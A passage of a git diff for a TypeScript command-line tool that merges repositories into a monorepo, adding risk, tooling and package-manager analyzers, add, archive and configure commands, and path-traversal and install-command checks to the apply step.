(const repo of repoPaths) { + try { + const files = await listFiles(repo.path); + for (const file of files) { + const lower = file.toLowerCase(); + if (!allFiles.has(lower)) allFiles.set(lower, []); + allFiles.get(lower)!.push({ repo: repo.name, file }); + } + } catch (err) { + logger.debug?.('Failed to list files for case-collision check in ' + repo.name + ': ' + (err instanceof Error ? err.message : String(err))); + } + } + + for (const [, entries] of allFiles) { + const uniqueNames = [...new Set(entries.map((e) => e.file))]; + if (uniqueNames.length > 1) { + findings.push({ + id: `risk-case-collision-${uniqueNames[0]}`, + title: `Case collision: ${uniqueNames.join(' vs ')}`, + severity: 'error', + confidence: 'high', + evidence: entries.map((e) => ({ path: e.repo, snippet: e.file })), + suggestedAction: 'Rename one of the files to avoid case-insensitive filesystem conflicts', + }); + } + } + + logger.debug(`Repo risks analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/risk-summary.ts b/src/analyzers/risk-summary.ts new file mode 100755 index 0000000..49d0ece --- /dev/null +++ b/src/analyzers/risk-summary.ts @@ -0,0 +1,68 @@ +import type { AnalysisFinding, RiskClassification, RiskSummary } from '../types/index.js'; + +/** + * Classify migration risk from all findings. + */ +export function classifyRisk(allFindings: AnalysisFinding[]): RiskSummary { + const reasons: string[] = []; + let classification: RiskClassification = 'straightforward'; + + const criticalCount = allFindings.filter((f) => f.severity === 'critical').length; + const errorCount = allFindings.filter((f) => f.severity === 'error').length; + const warnCount = allFindings.filter((f) => f.severity === 'warn').length; + + if (criticalCount > 0) { + classification = 'complex'; + reasons.push(`${criticalCount} critical issue(s) require resolution`); + } + + if (errorCount > 0) { + classification = classification === 'complex' ? 'complex' : 'needs-decisions'; + reasons.push(`${errorCount} error-level finding(s) need attention`); + } + + if (warnCount > 3) { + if (classification === 'straightforward') classification = 'needs-decisions'; + reasons.push(`${warnCount} warnings detected`); + } + + // Check for specific risk patterns + const hasSubmodules = allFindings.some((f) => f.id.startsWith('risk-submodules')); + const hasLFS = allFindings.some((f) => f.id.startsWith('risk-lfs')); + const hasMultipleCI = allFindings.some((f) => f.id === 'ci-multiple-systems'); + const hasNodeMismatch = allFindings.some((f) => f.id === 'env-node-mismatch'); + const hasCaseCollision = allFindings.some((f) => f.id.startsWith('risk-case-collision')); + + if (hasSubmodules) { + classification = 'complex'; + reasons.push('Git submodules require manual resolution'); + } + if (hasLFS) { + if (classification === 'straightforward') classification = 'needs-decisions'; + reasons.push('Git LFS requires configuration'); + } + if (hasMultipleCI) { + if (classification === 'straightforward') classification = 'needs-decisions'; + reasons.push('Multiple CI systems need consolidation'); + } + if (hasNodeMismatch) { + reasons.push('Node.js versions are inconsistent'); + } + if (hasCaseCollision) { + classification = 'complex'; + reasons.push('File case collisions must be resolved'); + } + + if (reasons.length === 0) { + reasons.push('No significant risks detected'); + } + + // Get top findings (most severe first) + const severityOrder: Record = { critical: 0, error: 1, warn: 2, info: 3 }; + const sorted = [...allFindings].sort( + (a, b) => (severityOrder[a.severity] ?? 4) - (severityOrder[b.severity] ?? 4), + ); + const topFindings = sorted.slice(0, 5); + + return { classification, reasons, topFindings }; +} diff --git a/src/analyzers/suggestions.ts b/src/analyzers/suggestions.ts new file mode 100755 index 0000000..3b49ac3 --- /dev/null +++ b/src/analyzers/suggestions.ts @@ -0,0 +1,217 @@ +import type { SuggestedDecision, DependencyConflict } from '../types/index.js'; +import { pathExists, readJson } from '../utils/fs.js'; +import path from 'node:path'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +/** + * Suggest package manager based on lockfile presence and packageManager fields. + */ +export async function suggestPackageManager( + repoPaths: Array<{ path: string; name: string }> +): Promise { + const counts: Record = { pnpm: 0, yarn: 0, npm: 0 }; + const evidence: string[] = []; + + for (const repo of repoPaths) { + // Check for lockfiles + if (await pathExists(path.join(repo.path, 'pnpm-lock.yaml'))) { + counts.pnpm++; + evidence.push(`${repo.name} has pnpm-lock.yaml`); + } + if (await pathExists(path.join(repo.path, 'yarn.lock'))) { + counts.yarn++; + evidence.push(`${repo.name} has yarn.lock`); + } + if (await pathExists(path.join(repo.path, 'package-lock.json'))) { + counts.npm++; + evidence.push(`${repo.name} has package-lock.json`); + } + + // Check for packageManager field in package.json + const pkgJsonPath = path.join(repo.path, 'package.json'); + if (await pathExists(pkgJsonPath)) { + try { + const pkg = await readJson>(pkgJsonPath); + if (typeof pkg.packageManager === 'string') { + const pmField = pkg.packageManager as string; + if (pmField.startsWith('pnpm')) { + counts.pnpm++; + evidence.push(`${repo.name} has packageManager field: ${pmField}`); + } else if (pmField.startsWith('yarn')) { + counts.yarn++; + evidence.push(`${repo.name} has packageManager field: ${pmField}`); + } else if (pmField.startsWith('npm')) { + counts.npm++; + evidence.push(`${repo.name} has packageManager field: ${pmField}`); + } + } + } catch (error) { + evidence.push( + `Could not parse package.json in ${repo.name}: ${getErrorMessage(error)}` + ); + } + } + } + + // Determine winner by majority vote, prefer pnpm if tied + const sorted = Object.entries(counts).sort((a, b) => b[1] - a[1]); + const topCount = sorted[0][1]; + + let suggestion: string; + if (topCount === 0) { + // No signals found, default to pnpm + suggestion = 'pnpm'; + evidence.push('No lockfiles or packageManager fields found, defaulting to pnpm'); + } else { + // Check for ties at the top + const tied = sorted.filter(([, count]) => count === topCount); + if (tied.length > 1 && tied.some(([pm]) => pm === 'pnpm')) { + suggestion = 'pnpm'; + evidence.push('Tied between package managers, preferring pnpm'); + } else { + suggestion = sorted[0][0]; + } + } + + // Determine confidence + const total = counts.pnpm + counts.yarn + counts.npm; + let confidence: 'high' | 'medium' | 'low'; + if (total === 0) { + confidence = 'low'; + } else if (counts[suggestion] === total) { + confidence = 'high'; + } else if (counts[suggestion] > total / 2) { + confidence = 'medium'; + } else { + confidence = 'low'; + } + + const alternatives = ['pnpm', 'yarn', 'npm'].filter((pm) => pm !== suggestion); + + return { + topic: 'package-manager', + suggestion, + confidence, + evidence, + alternatives, + }; +} + +/** + * Suggest workspace tool (turbo, nx, or none). + */ +export async function suggestWorkspaceTool( + repoPaths: Array<{ path: string; name: string }> +): Promise { + const evidence: string[] = []; + let turboCount = 0; + let nxCount = 0; + + for (const repo of repoPaths) { + if (await pathExists(path.join(repo.path, 'turbo.json'))) { + turboCount++; + evidence.push(`${repo.name} has turbo.json`); + } + if (await pathExists(path.join(repo.path, 'nx.json'))) { + nxCount++; + evidence.push(`${repo.name} has nx.json`); + } + } + + let suggestion: string; + let confidence: 'high' | 'medium' | 'low'; + + if (turboCount > 0 && nxCount > 0) { + // Both found - prefer whichever has more, turbo wins ties + suggestion = turboCount >= nxCount ? 'turbo' : 'nx'; + confidence = 'low'; + evidence.push('Both turbo and nx configs found across repos'); + } else if (turboCount > 0) { + suggestion = 'turbo'; + confidence = turboCount === repoPaths.length ? 'high' : 'medium'; + } else if (nxCount > 0) { + suggestion = 'nx'; + confidence = nxCount === repoPaths.length ? 'high' : 'medium'; + } else { + suggestion = 'none'; + confidence = 'medium'; + evidence.push('No workspace tool configs found in any repo'); + } + + const alternatives = ['turbo', 'nx', 'none'].filter((t) => t !== suggestion); + + return { + topic: 'workspace-tool', + suggestion, + confidence, + evidence, + alternatives, + }; +} + +/** + * Suggest dependency resolution strategy based on conflict analysis. + */ +export function suggestDependencyStrategy( + conflicts: DependencyConflict[] +): SuggestedDecision { + const evidence: string[] = []; + + if (conflicts.length === 0) { + return { + topic: 'dependency-strategy', + suggestion: 'hoist', + confidence: 'high', + evidence: ['No dependency conflicts detected'], + alternatives: ['isolate', 'hoist-with-overrides'], + }; + } + + const incompatibleCount = conflicts.filter((c) => c.severity === 'incompatible').length; + const majorCount = conflicts.filter((c) => c.severity === 'major').length; + const minorCount = conflicts.filter((c) => c.severity === 'minor').length; + + evidence.push( + `Found ${conflicts.length} conflicts: ${incompatibleCount} incompatible, ${majorCount} major, ${minorCount} minor` + ); + + let suggestion: string; + let confidence: 'high' | 'medium' | 'low'; + + if (incompatibleCount > conflicts.length / 2) { + // Many incompatible conflicts - isolate packages + suggestion = 'isolate'; + confidence = 'high'; + evidence.push('Majority of conflicts are incompatible, isolation recommended'); + } else if (incompatibleCount === 0 && majorCount === 0) { + // Only minor conflicts - safe to hoist + suggestion = 'hoist'; + confidence = 'high'; + evidence.push('All conflicts are minor, hoisting is safe'); + } else if (incompatibleCount > 0) { + // Mixed with some incompatible - use overrides + suggestion = 'hoist-with-overrides'; + confidence = 'medium'; + evidence.push('Mix of conflict severities, overrides can resolve most issues'); + } else { + // Only major conflicts + suggestion = 'hoist-with-overrides'; + confidence = 'medium'; + evidence.push('Major conflicts can be resolved with version overrides'); + } + + const alternatives = ['hoist', 'isolate', 'hoist-with-overrides'].filter( + (s) => s !== suggestion + ); + + return { + topic: 'dependency-strategy', + suggestion, + confidence, + evidence, + alternatives, + }; +} diff --git a/src/analyzers/tooling.ts b/src/analyzers/tooling.ts new file mode 100755 index 0000000..73d3f69 --- /dev/null +++ b/src/analyzers/tooling.ts @@ -0,0 +1,130 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readJson } from '../utils/fs.js'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +const TOOL_CONFIGS: Array<{ + name: string; + category: string; + files: string[]; +}> = [ + { name: 'TypeScript', category: 'typescript', files: ['tsconfig.json', 'tsconfig.build.json'] }, + { + name: 'ESLint', + category: 'lint', + files: ['.eslintrc.json', '.eslintrc.yml', '.eslintrc.yaml', '.eslintrc.js', '.eslintrc.cjs', 'eslint.config.js', 'eslint.config.mjs'], + }, + { + name: 'Prettier', + category: 'format', + files: ['.prettierrc', '.prettierrc.json', '.prettierrc.yaml', '.prettierrc.yml', '.prettierrc.js', '.prettierrc.cjs', 'prettier.config.js'], + }, + { + name: 'Jest', + category: 'test', + files: ['jest.config.js', 'jest.config.ts', 'jest.config.cjs', 'jest.config.mjs'], + }, + { + name: 'Vitest', + category: 'test', + files: ['vitest.config.ts', 'vitest.config.js', 'vitest.config.mts'], + }, +]; + +/** + * Analyze development tooling across repositories. + * Detects TypeScript, lint, format, and test configurations. + */ +export async function analyzeTooling( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const toolPresence: Record> = {}; + + for (const repo of repoPaths) { + for (const tool of TOOL_CONFIGS) { + for (const file of tool.files) { + const filePath = path.join(repo.path, file); + if (await pathExists(filePath)) { + const key = tool.name; + if (!toolPresence[key]) toolPresence[key] = []; + toolPresence[key].push({ repo: repo.name, file }); + } + } + } + + // Check for test framework in package.json + const pkgPath = path.join(repo.path, 'package.json'); + if (await pathExists(pkgPath)) { + try { + const pkg = (await readJson(pkgPath)) as Record; + const scripts = (pkg.scripts as Record) || {}; + if (scripts.test && !scripts.test.includes('echo')) { + // Has a real test script + } else if (!scripts.test) { + findings.push({ + id: `tooling-no-test-${repo.name}`, + title: `No test script in ${repo.name}`, + severity: 'info', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: 'scripts.test is missing' }], + suggestedAction: 'Add a test script to package.json', + }); + } + } catch (error) { + findings.push({ + id: `tooling-malformed-package-json-${repo.name}`, + title: `Malformed package.json in ${repo.name}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: getErrorMessage(error) }], + suggestedAction: 'Fix package.json syntax to analyze tooling scripts safely.', + }); + } + } + } + + // Flag inconsistencies + for (const [tool, repos] of Object.entries(toolPresence)) { + // Check if some repos use it and some don't + const repoNames = new Set(repos.map((r) => r.repo)); + const allRepoNames = repoPaths.map((r) => r.name); + const missing = allRepoNames.filter((r) => !repoNames.has(r)); + + if (missing.length > 0 && repoNames.size > 0) { + findings.push({ + id: `tooling-inconsistent-${tool.toLowerCase()}`, + title: `${tool} not used consistently across repos`, + severity: 'info', + confidence: 'medium', + evidence: [ + ...repos.map((r) => ({ path: r.repo, snippet: `has ${r.file}` })), + ...missing.map((r) => ({ path: r, snippet: `missing ${tool} config` })), + ], + suggestedAction: `Consider standardizing ${tool} configuration across all packages`, + }); + } + + // Check for JS configs that can't be safely merged + const jsConfigs = repos.filter( + (r) => r.file.endsWith('.js') || r.file.endsWith('.cjs') || r.file.endsWith('.mjs'), + ); + if (jsConfigs.length > 0) { + findings.push({ + id: `tooling-executable-config-${tool.toLowerCase()}`, + title: `${tool} uses executable config files`, + severity: 'warn', + confidence: 'high', + evidence: jsConfigs.map((r) => ({ path: path.join(r.repo, r.file) })), + suggestedAction: `Executable ${tool} configs cannot be safely auto-merged. Manual review required.`, + }); + } + } + + logger.debug(`Tooling analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/commands/add.ts b/src/commands/add.ts new file mode 100755 index 0000000..9a0a059 --- /dev/null +++ b/src/commands/add.ts @@ -0,0 +1,91 @@ +import path from 'node:path'; +import { createLogger } from '../utils/logger.js'; +import { writeJson } from '../utils/fs.js'; +import { parseConflictStrategy } from '../utils/cli-options.js'; +import { tryParsePackageManagerType } from '../strategies/package-manager.js'; +import { generateAddPlan, applyAddPlan } from '../strategies/add.js'; +import type { AddCommandOptions } from '../types/index.js'; + +interface CLIAddOptions { + to: string; + packagesDir: string; + out?: string; + apply?: boolean; + conflictStrategy: string; + verbose?: boolean; + packageManager: string; +} + +export async function addCommand(repo: string, options: CLIAddOptions): Promise { + const logger = createLogger(options.verbose); + const conflictStrategy = parseConflictStrategy(options.conflictStrategy); + const packageManager = tryParsePackageManagerType(options.packageManager); + + if (!conflictStrategy) { + logger.error( + `Invalid conflict strategy: ${options.conflictStrategy}. Valid options: highest, lowest, prompt` + ); + process.exitCode = 1; + return; + } + + if (!packageManager) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + process.exitCode = 1; + return; + } + + const cmdOptions: AddCommandOptions = { + to: path.resolve(options.to), + packagesDir: options.packagesDir, + out: options.out, + apply: options.apply, + conflictStrategy, + verbose: options.verbose, + packageManager, + }; + + try { + logger.info('Generating add plan...'); + const plan = await generateAddPlan(repo, cmdOptions, logger); + + // Write plan to file + const planPath = options.out || `add-plan-${plan.sourceRepo.name}.json`; + const absPath = path.resolve(planPath); + await writeJson(absPath, plan); + logger.success(`Plan written to ${absPath}`); + + // Print summary + logger.info(`\nAdd Plan Summary:`); + logger.info(` Source: ${plan.sourceRepo.original}`); + logger.info(` Target: ${plan.targetMonorepo}`); + logger.info(` Packages dir: ${plan.packagesDir}`); + logger.info(` Conflicts: ${plan.analysis.conflicts.length}`); + logger.info(` Operations: ${plan.operations.length}`); + logger.info(` Complexity: ${plan.analysis.complexityScore}/100`); + + if (plan.decisions.length > 0) { + logger.info(`\nDecisions:`); + for (const d of plan.decisions) { + logger.info(` ${d.id}: ${d.chosen} (alternatives: ${d.alternatives.join(', ') || 'none'})`); + } + } + + // Apply if requested + if (options.apply) { + logger.info('\nApplying plan...'); + const result = await applyAddPlan(plan, logger); + if (result.success) { + logger.success(`Package added at ${result.packageDir}`); + } + } else { + logger.info(`\nTo apply: monorepo apply --plan ${planPath} --out ${cmdOptions.to}`); + } + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + logger.error(`Add failed: ${msg}`); + process.exitCode = 1; + } +} diff --git a/src/commands/analyze.ts b/src/commands/analyze.ts index a4f1119..92ef253 100755 --- a/src/commands/analyze.ts +++ b/src/commands/analyze.ts @@ -4,15 +4,23 @@ import type { CircularDependency, CrossDependency, DependencyConflict, + ExtendedAnalysis, FileCollision, PackageInfo, } from '../types/index.js'; import { createLogger, formatHeader, formatList } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { createTempDir, removeDir } from '../utils/fs.js'; import { validateRepoSources } from '../utils/validation.js'; import { analyzeDependencies } from '../analyzers/dependencies.js'; import { detectFileCollisions } from '../analyzers/files.js'; import { detectCircularDependencies, computeHotspots } from '../analyzers/graph.js'; +import { analyzeEnvironment } from '../analyzers/environment.js'; +import { analyzeTooling } from '../analyzers/tooling.js'; +import { analyzeCI } from '../analyzers/ci.js'; +import { analyzePublishing } from '../analyzers/publishing.js'; +import { analyzeRepoRisks } from '../analyzers/repo-risks.js'; +import { classifyRisk } from '../analyzers/risk-summary.js'; import { cloneOrCopyRepos } from '../strategies/copy.js'; import { getConflictSummary } from '../resolvers/dependencies.js'; @@ -365,6 +373,50 @@ function printAnalysisReport(result: AnalyzeResult, verbose: boolean): void { : 'High'; logger.log(` ${scoreColor(`${result.complexityScore}/100`)} (${scoreLabel})`); + // Extended Analysis + if (result.extendedAnalysis) { + const ext = result.extendedAnalysis; + const sections = [ + { label: 'Environment', findings: ext.environment }, + { label: 'Tooling', findings: ext.tooling }, + { label: 'CI/CD', findings: ext.ci }, + { label: 'Publishing', findings: ext.publishing }, + { label: 'Repo Risks', findings: ext.repoRisks }, + ]; + + for (const section of sections) { + if (section.findings.length > 0) { + logger.log(chalk.bold(`\n${section.label}:`)); + for (const f of section.findings) { + const color = f.severity === 'error' || f.severity === 'critical' + ? chalk.red + : f.severity === 'warn' + ? chalk.yellow + : chalk.gray; + logger.log(` ${color('•')} ${f.title}`); + if (verbose && f.suggestedAction) { + logger.log(` ${chalk.cyan('→')} ${f.suggestedAction}`); + } + } + } + } + + // Risk summary + const risk = ext.riskSummary; + const riskColor = risk.classification === 'complex' + ? chalk.red + : risk.classification === 'needs-decisions' + ? chalk.yellow + : chalk.green; + logger.log(chalk.bold('\nRisk classification:')); + logger.log(` ${riskColor(risk.classification)}`); + if (risk.reasons.length > 0 && verbose) { + for (const reason of risk.reasons) { + logger.log(` ${chalk.gray('•')} ${reason}`); + } + } + } + // Recommendations if (result.recommendations.length > 0) { logger.log(chalk.bold('\nRecommendations:')); @@ -408,7 +460,7 @@ export async function analyzeCommand( logger.error(error); } } - process.exit(1); + throw new CliExitError(); } if (!options.json) { @@ -461,6 +513,36 @@ export async function analyzeCommand( // Step 6c: Compute hotspots const hotspots = computeHotspots(depAnalysis.packages, depAnalysis.conflicts); + // Step 6d: Extended analysis + if (!options.json) { + logger.info('Running extended analysis...'); + } + + const analysisLogger = options.json ? silentLogger : logger; + const [envFindings, toolingFindings, ciFindings, publishFindings, riskFindings] = + await Promise.all([ + analyzeEnvironment(repoPaths, analysisLogger), + analyzeTooling(repoPaths, analysisLogger), + analyzeCI(repoPaths, analysisLogger), + analyzePublishing(repoPaths, analysisLogger), + analyzeRepoRisks(repoPaths, analysisLogger), + ]); + + const allExtendedFindings = [ + ...envFindings, ...toolingFindings, ...ciFindings, + ...publishFindings, ...riskFindings, + ]; + + const extendedAnalysis: ExtendedAnalysis = { + environment: envFindings, + packageManager: [], // already covered by main dep analysis + tooling: toolingFindings, + ci: ciFindings, + publishing: publishFindings, + repoRisks: riskFindings, + riskSummary: classifyRisk(allExtendedFindings), + }; + // Extract peer conflicts for scoring const peerConflicts = depAnalysis.findings?.peerConflicts ?? []; @@ -495,6 +577,7 @@ export async function analyzeCommand( circularDependencies: circularDependencies.length > 0 ? circularDependencies : undefined, hotspots: hotspots.length > 0 ? hotspots : undefined, findings: depAnalysis.findings, + extendedAnalysis, }; // Output @@ -520,11 +603,13 @@ export async function analyzeCommand( if (tempDir) { try { await removeDir(tempDir); - } catch { - // Ignore cleanup errors + } catch (cleanupError) { + const cleanupMessage = + cleanupError instanceof Error ? cleanupError.message : String(cleanupError); + logger.debug(`Failed to clean temporary directory ${tempDir}: ${cleanupMessage}`); } } - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/apply.ts b/src/commands/apply.ts index 84eb1ec..cd642f4 100755 --- a/src/commands/apply.ts +++ b/src/commands/apply.ts @@ -10,6 +10,7 @@ import type { Logger, } from '../types/index.js'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { ensureDir, move, @@ -28,6 +29,38 @@ import { computePlanHash, } from '../utils/operation-log.js'; +/** + * Assert that a path, when resolved relative to a base directory, + * stays within that base directory. Prevents path traversal attacks. + */ +function assertPathContained(base: string, relativePath: string): void { + const resolved = path.resolve(base, relativePath); + const normalizedBase = path.resolve(base) + path.sep; + if (!resolved.startsWith(normalizedBase) && resolved !== path.resolve(base)) { + throw new Error(`Path traversal detected: "${relativePath}" escapes base directory`); + } +} + +const ALLOWED_INSTALL_EXECUTABLES = new Set(['pnpm', 'npm', 'yarn', 'bun', 'npx']); + +/** + * Validate and parse an install command, ensuring only approved executables are used. + */ +function validateInstallCommand(cmd: string): { exe: string; args: string[] } { + const parts = cmd.split(/\s+/).filter(Boolean); + if (parts.length === 0) { + throw new Error('Install command is empty'); + } + const exe = parts[0]; + if (!ALLOWED_INSTALL_EXECUTABLES.has(exe)) { + throw new Error( + `Install command executable "${exe}" is not allowed. ` + + `Allowed executables: ${[...ALLOWED_INSTALL_EXECUTABLES].join(', ')}` + ); + } + return { exe, args: parts.slice(1) }; +} + /** * CLI options passed from commander */ @@ -49,6 +82,7 @@ export function validatePlan(data: unknown): data is ApplyPlan { if (plan.version !== 1) return false; if (!Array.isArray(plan.sources) || plan.sources.length === 0) return false; if (typeof plan.packagesDir !== 'string') return false; + if (plan.packagesDir.includes('..') || path.isAbsolute(plan.packagesDir)) return false; if (typeof plan.rootPackageJson !== 'object' || plan.rootPackageJson === null) return false; if (!Array.isArray(plan.files)) return false; if (typeof plan.install !== 'boolean') return false; @@ -61,6 +95,8 @@ export function validatePlan(data: unknown): data is ApplyPlan { if (typeof file !== 'object' || file === null) return false; const f = file as Record; if (typeof f.relativePath !== 'string' || typeof f.content !== 'string') return false; + // Reject path traversal attempts + if (f.relativePath.includes('..') || path.isAbsolute(f.relativePath as string)) return false; } return true; } @@ -162,7 +198,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const planPath = path.resolve(options.plan); if (!(await pathExists(planPath))) { logger.error(`Plan file not found: ${planPath}`); - process.exit(1); + throw new CliExitError(); } const planContent = await readFile(planPath); @@ -173,14 +209,12 @@ export async function applyCommand(options: CLIApplyOptions): Promise { plan = JSON.parse(planContent); } catch { logger.error('Plan file contains invalid JSON.'); - process.exit(1); - return; // unreachable, satisfies TS + throw new CliExitError(); } if (!validatePlan(plan)) { logger.error('Plan file is invalid. Check version, sources, packagesDir, rootPackageJson, files, and install fields.'); - process.exit(1); - return; + throw new CliExitError(); } // --dry-run: print steps and exit @@ -213,13 +247,11 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const stagingDirs = await findStagingDirs(outputDir); if (stagingDirs.length === 0) { logger.error('No staging directory found to resume. Run without --resume to start fresh.'); - process.exit(1); - return; + throw new CliExitError(); } if (stagingDirs.length > 1) { logger.error(`Multiple staging directories found. Run with --cleanup first.`); - process.exit(1); - return; + throw new CliExitError(); } stagingDir = stagingDirs[0]; logPath = getLogPath(stagingDir); @@ -229,8 +261,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const headerEntry = logEntries.find((e) => e.id === 'header'); if (headerEntry?.planHash && headerEntry.planHash !== planHash) { logger.error('Plan file has changed since the staging directory was created. Use --cleanup first.'); - process.exit(1); - return; + throw new CliExitError(); } const completedSteps = logEntries.filter((e) => e.status === 'completed').length; @@ -250,7 +281,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { if (!(await pathExists(source.path))) { logger.error(`Source path not found: ${source.path} (for package "${source.name}")`); logger.info('Source repos may have been cleaned up. Regenerate the plan file.'); - process.exit(1); + throw new CliExitError(); } } } @@ -280,6 +311,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const outputs: string[] = []; for (const source of plan.sources) { if (signal.aborted) break; + assertPathContained(stagingDir, path.join(plan.packagesDir, source.name)); const targetPath = path.join(stagingDir, plan.packagesDir, source.name); if (await pathExists(targetPath)) { logger.debug(`Package "${source.name}" already in staging, skipping`); @@ -309,6 +341,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const outputs: string[] = []; for (const file of plan.files) { if (signal.aborted) break; + assertPathContained(stagingDir, file.relativePath); const filePath = path.join(stagingDir, file.relativePath); await ensureDir(path.dirname(filePath)); await writeFile(filePath, file.content); @@ -325,8 +358,8 @@ export async function applyCommand(options: CLIApplyOptions): Promise { if (plan.install) { const installOk = await executeStep('install', logPath, logEntries, signal, logger, async () => { const cmd = plan.installCommand || 'pnpm install --ignore-scripts'; - logger.info(`Installing dependencies: ${cmd}`); - const [exe, ...args] = cmd.split(' '); + const { exe, args } = validateInstallCommand(cmd); + logger.info(`Installing dependencies: ${exe} ${args.join(' ')}`); execFileSync(exe, args, { cwd: stagingDir, stdio: options.verbose ? 'inherit' : 'pipe', diff --git a/src/commands/archive.ts b/src/commands/archive.ts new file mode 100755 index 0000000..3e7d007 --- /dev/null +++ b/src/commands/archive.ts @@ -0,0 +1,77 @@ +import path from 'node:path'; +import { createLogger } from '../utils/logger.js'; +import { writeJson } from '../utils/fs.js'; +import { generateArchivePlan, applyArchiveViaGitHubApi } from '../strategies/archive.js'; + +interface CLIArchiveOptions { + monorepoUrl: string; + out?: string; + apply?: boolean; + tokenFromEnv?: boolean; + verbose?: boolean; +} + +export async function archiveCommand(repos: string[], options: CLIArchiveOptions): Promise { + const logger = createLogger(options.verbose); + + try { + logger.info(`Generating archive plan for ${repos.length} repositories...`); + + const plan = await generateArchivePlan(repos, options.monorepoUrl, { + tokenFromEnv: options.tokenFromEnv, + }); + + // Write plan to file + const planPath = options.out || 'archive.plan.json'; + const absPath = path.resolve(planPath); + await writeJson(absPath, plan); + logger.success(`Archive plan written to ${absPath}`); + + // Print summary + logger.info(`\nArchive Plan Summary:`); + logger.info(` Repositories: ${plan.repos.length}`); + logger.info(` Monorepo URL: ${plan.monorepoUrl}`); + for (const repo of plan.repos) { + logger.info(` - ${repo.name} (${repo.url})`); + } + + // Show README patches + logger.info(`\nREADME deprecation patches generated for ${plan.repos.length} repos.`); + logger.info('These patches can be applied without a GitHub token.'); + + if (plan.apiOperations?.length) { + logger.info(`\nAPI operations (require GITHUB_TOKEN):`); + for (const op of plan.apiOperations) { + logger.info(` - ${op.action}: ${op.repo}`); + } + } + + // Apply if requested + if (options.apply) { + if (!plan.apiOperations?.length) { + logger.warn('No API operations to apply. Use --token-from-env to include archive operations.'); + return; + } + + logger.info('\nApplying archive operations via GitHub API...'); + const result = await applyArchiveViaGitHubApi(plan, logger); + + if (result.applied.length > 0) { + logger.success(`Archived ${result.applied.length} repositories`); + } + if (result.failed.length > 0) { + logger.error(`Failed to archive ${result.failed.length} repositories:`); + for (const f of result.failed) { + logger.error(` ${f.repo}: ${f.error}`); + } + process.exitCode = 1; + } + } else { + logger.info(`\nTo apply: monorepo archive ${repos.join(' ')} --monorepo-url ${options.monorepoUrl} --apply --token-from-env`); + } + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + logger.error(`Archive failed: ${msg}`); + process.exitCode = 1; + } +} diff --git a/src/commands/configure.ts b/src/commands/configure.ts new file mode 100755 index 0000000..f632d23 --- /dev/null +++ b/src/commands/configure.ts @@ -0,0 +1,104 @@ +import path from 'node:path'; +import chalk from 'chalk'; +import type { Command } from 'commander'; +import { createLogger, formatHeader } from '../utils/logger.js'; +import { pathExists, writeJson } from '../utils/fs.js'; +import { generateConfigPlan, applyConfigPlan } from '../strategies/configure.js'; +import { CliExitError } from '../utils/errors.js'; + +interface CLIConfigureOptions { + apply?: boolean; + out?: string; + packagesDir: string; + verbose?: boolean; +} + +async function configureCommand(monorepoDir: string, options: CLIConfigureOptions): Promise { + const logger = createLogger(options.verbose); + const resolvedDir = path.resolve(monorepoDir); + + logger.log(formatHeader('Configure')); + + // Validate the monorepo directory exists + if (!(await pathExists(resolvedDir))) { + logger.error(`Monorepo directory not found: ${resolvedDir}`); + throw new CliExitError(); + } + + // Discover packages in the packages directory + const pkgsDirPath = path.join(resolvedDir, options.packagesDir); + let packageNames: string[] = []; + + if (await pathExists(pkgsDirPath)) { + const { default: fs } = await import('fs-extra'); + const entries = await fs.readdir(pkgsDirPath, { withFileTypes: true }); + packageNames = entries + .filter((e) => e.isDirectory()) + .map((e) => e.name); + } + + logger.info(`Found ${packageNames.length} package(s) in ${options.packagesDir}/`); + + // Generate the ConfigPlan + const plan = await generateConfigPlan( + resolvedDir, + packageNames, + options.packagesDir, + {}, + logger, + ); + + // Display patches + if (plan.patches.length > 0) { + logger.log(''); + logger.log(chalk.cyan.bold('Patches:')); + for (const patch of plan.patches) { + const label = patch.before ? 'UPDATE' : 'CREATE'; + logger.log(` [${label}] ${patch.path} — ${patch.description}`); + } + } else { + logger.log(''); + logger.success('No config patches needed — everything is already configured.'); + } + + // Display warnings + if (plan.warnings.length > 0) { + logger.log(''); + logger.log(chalk.yellow.bold('Warnings:')); + for (const warning of plan.warnings) { + logger.warn(` ${warning.config}: ${warning.reason}`); + logger.log(` Suggestion: ${warning.suggestion}`); + } + } + + // Optionally write plan JSON to file + if (options.out) { + const outPath = path.resolve(options.out); + await writeJson(outPath, plan, { spaces: 2 }); + logger.log(''); + logger.success(`Plan written to ${outPath}`); + } + + // Optionally apply + if (options.apply) { + logger.log(''); + logger.info('Applying config plan...'); + await applyConfigPlan(plan, resolvedDir, logger); + logger.success('Config plan applied successfully.'); + } else if (!options.out && plan.patches.length > 0) { + logger.log(''); + logger.log('Run with --apply to write these files, or --out to save the plan as JSON.'); + } +} + +export function registerConfigureCommand(program: Command): void { + program + .command('configure') + .description('Scaffold shared configs (Prettier, ESLint, TypeScript) for a monorepo') + .argument('', 'Path to the monorepo directory') + .option('--apply', 'Apply changes to disk') + .option('--out ', 'Write plan JSON to file') + .option('-p, --packages-dir ', 'Packages subdirectory name', 'packages') + .option('-v, --verbose', 'Verbose output') + .action(configureCommand); +} diff --git a/src/commands/init.ts b/src/commands/init.ts index 7934143..5f3821f 100755 --- a/src/commands/init.ts +++ b/src/commands/init.ts @@ -2,6 